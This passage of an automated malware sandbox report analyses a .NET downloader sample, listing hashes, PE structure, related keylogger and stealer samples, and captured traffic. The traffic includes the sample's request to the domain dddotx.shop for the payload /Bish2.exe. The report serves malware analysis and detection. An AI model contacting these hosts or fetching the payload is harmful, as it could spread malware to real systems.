        n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
        • 188.114.96.3
        njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
        • 188.114.96.3
        KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
        • 188.114.96.3
        KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
        • 188.114.96.3
        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
        • 188.114.96.3
        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
        • 188.114.96.3
        ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
        • 188.114.96.3

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AJ5zYYsisA.exe.log

        Download File
        Process:C:\Users\user\Desktop\AJ5zYYsisA.exe
        File Type:CSV text
        Category:dropped
        Size (bytes):847
        Entropy (8bit):5.345615485833535
        Encrypted:false
        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
        Malicious:true
        Reputation:moderate, very likely benign file
        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
        Entropy (8bit):4.14477814728973
        TrID:
        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        • Win32 Executable (generic) a (10002005/4) 49.78%
        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
        • Generic Win/DOS Executable (2004/3) 0.01%
        • DOS Executable Generic (2002/1) 0.01%
        File name:AJ5zYYsisA.exe
        File size:101'376 bytes
        MD5:d522a48e0db195310ffe6dabf14d3c32
        SHA1:83a4dfb28a5c9710ff812e7f568bf71316e33665
        SHA256:846b1a1780ef242a61828a428ce04a9d40c3a6bd02de90a3a06499895899fede
        SHA512:6c70b5014807a03448a1d8b8aec3a2dc95e8e6c72c3a1313674bce278e94a7cd935dfc8375ad0c7fe92d5eff12f46b1fb81e971aafc70b83582c82349b57a46b
        SSDEEP:384:SmsWV1SRxW+dwMDS3b7202OtaiqLhSp1Xtff9vwEG9/XwJwq6uJfq2GSLwqX9vwt:SdiAZdwPLLNT0a22GZ2GzmW19
        TLSH:5BA3B330B6578721C52B1E31C8AD755C0372AF85A923DA5FE88C33799BF23C74A91B52
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....r...............0..x..........n.... ........@.. ....................................`................................

        File Icon

        Icon Hash:1a5ada12a98c3689

        Static PE Info

        General

        Entrypoint:0x40976e
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Time Stamp:0xEF72C5EC [Sat Apr 20 06:06:36 2097 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

        Entrypoint Preview

        Instruction
        jmp dword ptr [00402000h]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x97200x4b.text
        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x10e54.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000xc.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x96d40x1c.text
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x20000x77740x78006edf62815fb84feb6652ef2deb7c7accFalse0.35771484375data5.38635854985906IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rsrc0xa0000x10e540x1100083d61dc8e888d40f171008f7643aa345False0.05658318014705882data2.6807684242744467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x1c0000xc0x2003ee5eb55d2c84cad34ece42377c6f250False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

        Resources

        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0xa1300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.046891636105524666
        RT_GROUP_ICON0x1a9580x14data1.15
        RT_VERSION0x1a96c0x2fcdata0.43586387434554974
        RT_MANIFEST0x1ac680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

        Imports

        DLLImport
        mscoree.dll_CorExeMain

        Network Behavior

        Suricata IDS Alerts

        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
        2025-01-11T03:35:00.622476+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.749702188.114.96.3443TCP

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Jan 11, 2025 03:34:59.794503927 CET49702443192.168.2.7188.114.96.3
        Jan 11, 2025 03:34:59.794537067 CET44349702188.114.96.3192.168.2.7
        Jan 11, 2025 03:34:59.794605017 CET49702443192.168.2.7188.114.96.3
        Jan 11, 2025 03:34:59.808278084 CET49702443192.168.2.7188.114.96.3
        Jan 11, 2025 03:34:59.808299065 CET44349702188.114.96.3192.168.2.7
        Jan 11, 2025 03:35:00.277520895 CET44349702188.114.96.3192.168.2.7
        Jan 11, 2025 03:35:00.277610064 CET49702443192.168.2.7188.114.96.3
        Jan 11, 2025 03:35:00.281553030 CET49702443192.168.2.7188.114.96.3
        Jan 11, 2025 03:35:00.281563997 CET44349702188.114.96.3192.168.2.7
        Jan 11, 2025 03:35:00.281802893 CET44349702188.114.96.3192.168.2.7
        Jan 11, 2025 03:35:00.334992886 CET49702443192.168.2.7188.114.96.3
        Jan 11, 2025 03:35:00.347934008 CET49702443192.168.2.7188.114.96.3
        Jan 11, 2025 03:35:00.391335964 CET44349702188.114.96.3192.168.2.7
        Jan 11, 2025 03:35:00.622489929 CET44349702188.114.96.3192.168.2.7
        Jan 11, 2025 03:35:00.622582912 CET44349702188.114.96.3192.168.2.7
        Jan 11, 2025 03:35:00.622821093 CET49702443192.168.2.7188.114.96.3
        Jan 11, 2025 03:35:00.638020992 CET49702443192.168.2.7188.114.96.3

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Jan 11, 2025 03:34:59.767762899 CET6458153192.168.2.71.1.1.1
        Jan 11, 2025 03:34:59.780478001 CET53645811.1.1.1192.168.2.7

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jan 11, 2025 03:34:59.767762899 CET192.168.2.71.1.1.10x4385Standard query (0)dddotx.shopA (IP address)IN (0x0001)false

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jan 11, 2025 03:34:59.780478001 CET1.1.1.1192.168.2.70x4385No error (0)dddotx.shop188.114.96.3A (IP address)IN (0x0001)false
        Jan 11, 2025 03:34:59.780478001 CET1.1.1.1192.168.2.70x4385No error (0)dddotx.shop188.114.97.3A (IP address)IN (0x0001)false

        HTTP Request Dependency Graph

        • dddotx.shop

        HTTPS Proxied Packets

        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.749702188.114.96.34432868C:\Users\user\Desktop\AJ5zYYsisA.exe
        TimestampBytes transferredDirectionData
        2025-01-11 02:35:00 UTC70OUTGET /Bish2.exe HTTP/1.1
        Host: dddotx.shop
        Connection: Keep-Alive
        2025-01-11 02:35:00 UTC827INHTTP/1.1 404 Not Found
        Date: Sat, 11 Jan 2025 02:35:00 GMT
        Content-Type: text/html; charset=iso-8859-1
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=14400
        CF-Cache-Status: EXPIRED
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fuz5G1IHvIYKa3ZvgJDCAj%2BnzwVGGXWy3wDAJdvzNR0QyoD21js1xoESBMYGdTz%2FV4b12D0Y2VKNUtl3yPMNaqx83Jihz4gqbGdMH%2FpqtvOxu6433MNQFqW4p7MEFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 900182cf7a5a429a-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1858&rtt_var=722&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=684&delivery_rate=1489795&cwnd=237&unsent_bytes=0&cid=15301424f7eb13c0&ts=362&x=0"
        2025-01-11 02:35:00 UTC213INData Raw: 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 42 69 73 68 32 2e 65 78 65 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
        Data Ascii: cf<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /Bish2.exe was not found on this server.</p></body></html>
        2025-01-11 02:35:00 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        System Behavior

        General

        Target ID:0
        Start time:21:34:58
        Start date:10/01/2025
        Path:C:\Users\user\Desktop\AJ5zYYsisA.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\AJ5zYYsisA.exe"
        Imagebase:0x270000
        File size:101'376 bytes
        MD5 hash:D522A48E0DB195310FFE6DABF14D3C32
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Disassembly

        Reset < >

          Executed Functions

          Function 008E0800 Relevance: .1, Instructions: 136COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c0fb128bec88d4e8cc32e53133449092417066bfc3813af084fc7df4d4b4adf7
          • Instruction ID: 00ae98166cc54c7e54976abf4e3a133ace97b82d454b6d52922208fbba0453d4
          • Opcode Fuzzy Hash: c0fb128bec88d4e8cc32e53133449092417066bfc3813af084fc7df4d4b4adf7
          • Instruction Fuzzy Hash: 84419B74D09298CFDB04EFAAD8845EDBBB1FF8A310F28982AD405E7215D7B05986CF41
          Function 008E0838 Relevance: .1, Instructions: 115COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d5d20602c842de36bcd798d3973f9a7b37df2208e898197be53e268f1604ef0d
          • Instruction ID: 25f978a1b615dfb9f16acf5ac46148ec521664b642a4b2d00b194980406a01a4
          • Opcode Fuzzy Hash: d5d20602c842de36bcd798d3973f9a7b37df2208e898197be53e268f1604ef0d
          • Instruction Fuzzy Hash: 3F41F474D0425CDBDB04EFAAE8445EDBBB6FF8A310F24A42AD40AA7355D7B059868F40
          Function 008E0820 Relevance: .1, Instructions: 114COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 266790e74281aef0185b62ec18ab926ec4c724c6b749f00c547e4603da3f474e
          • Instruction ID: 21f126497ba5081e0ba44d064f9c66b1fdf2865355946566d3a5374546569918
          • Opcode Fuzzy Hash: 266790e74281aef0185b62ec18ab926ec4c724c6b749f00c547e4603da3f474e
          • Instruction Fuzzy Hash: 49410674D09258CFCB04EFAAE8845ACBBB5FF8A314F24A42AD409E7215C7705986CF40
          Function 008E0848 Relevance: .1, Instructions: 111COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4bd7754baf5130f854add8ecb22c994efadb18837946271254897e1f760ceee7
          • Instruction ID: ccdd7e32a3078c1f5a547e112206ed8d0698007006665a2c6bf75486a2ab83eb
          • Opcode Fuzzy Hash: 4bd7754baf5130f854add8ecb22c994efadb18837946271254897e1f760ceee7
          • Instruction Fuzzy Hash: 67411A74D0425CDBDB04EFA6D8445EDBBB6FF8A314F24A42AD40AA7315D7B05986CF40
          Function 008E0F83 Relevance: .1, Instructions: 74COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 19337b73a5004f1fbbc1ca003977653262f75ac6ed93fa9d3147a839a6194552
          • Instruction ID: bb6143844e81dcee81f08537ba001d22b2e134376a0c7e48ca4dee20a667fa36
          • Opcode Fuzzy Hash: 19337b73a5004f1fbbc1ca003977653262f75ac6ed93fa9d3147a839a6194552
          • Instruction Fuzzy Hash: 7E212770D0968CCBDB14CFA6D484AEDBBB6FF4A314F24A529D405E7255CB704881DF50
          Function 008E0FAF Relevance: .1, Instructions: 64COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c0a4198dfee619f098f45164ca1f7c4d0199056ac0109e6e81fbf3be86b8c0f6
          • Instruction ID: 68b77f21a37adf64d7adc04c2290c1f045737a2f6d00c176f28e742ae6b48c28
          • Opcode Fuzzy Hash: c0a4198dfee619f098f45164ca1f7c4d0199056ac0109e6e81fbf3be86b8c0f6
          • Instruction Fuzzy Hash: BD21F334D09288CBCF20DFAAD484AEDBBB5FB0A304F206529D419F3251C7705881DF50
          Function 008E09E8 Relevance: .0, Instructions: 42COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2ba02e4246e64adbec8a845e64e71c7a09c5176836eea559f9f87e3bc6e9338c
          • Instruction ID: 97757cbe059420e7ed6080cc0ff3c4209b233e850dd710cf932b9c0746854ef8
          • Opcode Fuzzy Hash: 2ba02e4246e64adbec8a845e64e71c7a09c5176836eea559f9f87e3bc6e9338c
          • Instruction Fuzzy Hash: D4F02B3094838CCBC7045F76E818AB9B779FB8B319F147875C109A3152DBF00895DE55
          Function 008E0A98 Relevance: .0, Instructions: 18COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 3cdb8ae1fca7f6f115a1bc4e572a6df055524422f061e55ca05883fec11979aa
          • Instruction ID: b9ebfab65c6f624594c81a97d8add11172841e9958a36cac286fc3abf2c195af
          • Opcode Fuzzy Hash: 3cdb8ae1fca7f6f115a1bc4e572a6df055524422f061e55ca05883fec11979aa
          • Instruction Fuzzy Hash: 97D012705493889FD7459FF49815A997B74FB43204F0411DBC444972E1E6714E40D791
          Function 008E0AA8 Relevance: .0, Instructions: 14COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1271963432.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_8e0000_AJ5zYYsisA.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a0bb53f2ab3a8a6ba7197b5bdd6ad8f386b6ea51ea32ea4749c3b6f6b0731e65
          • Instruction ID: 7457f46e248f5ffcae56d0e332cf56a819d5236b940c75f4bcc276dfc4aa15a8
          • Opcode Fuzzy Hash: a0bb53f2ab3a8a6ba7197b5bdd6ad8f386b6ea51ea32ea4749c3b6f6b0731e65
          • Instruction Fuzzy Hash: B6C0127054531CABD744DBA5D801F9D736CF783205F4011AAD404532909B711E50DA95